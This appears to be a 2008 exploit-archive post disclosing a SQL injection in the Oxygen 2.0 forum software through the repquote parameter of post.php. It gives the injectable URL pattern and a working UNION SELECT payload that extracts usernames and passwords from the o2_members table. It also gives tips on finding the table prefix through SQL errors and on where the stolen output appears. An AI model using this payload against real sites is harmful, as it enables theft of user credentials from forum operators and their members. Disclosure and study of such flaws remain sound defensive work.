Oxygen 2.0 (repquote) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Oxygen 2.0 (repquote) Remote SQL Injection Vulnerability
# Published : 2008-06-15
# Author : n/a
# Previous Title : Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit
# Next Title : SH-News 3.0 Insecure Cookie Handling Vulnerability

######################
#
#Oxygen 2.0 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#This Board Software suffers from a not correctly verified quote ID variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#We need a valid topic ID.
#Im not bored enough to code an exploit for this, so do it manually.
#Its by the way easy to find the correct prefix for the tables by producing a SQL Error.
#When injected your Query you can find the output in the Subject Text Box.
#
#SQL Injection:
#http://[target]/[path]/post.php?action=reply&tid=2517&repquote=[Sequel]
#
#PoC:
#post.php?action=reply&tid=2517&repquote=-1'%20union%20select%20concat(username,0x3a,password),2,3,4,5,6%20from%20o2_members--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the (...) h4ck-y0u Team!
#
#######################
####################### 

# www.Syue.com [2008-06-15]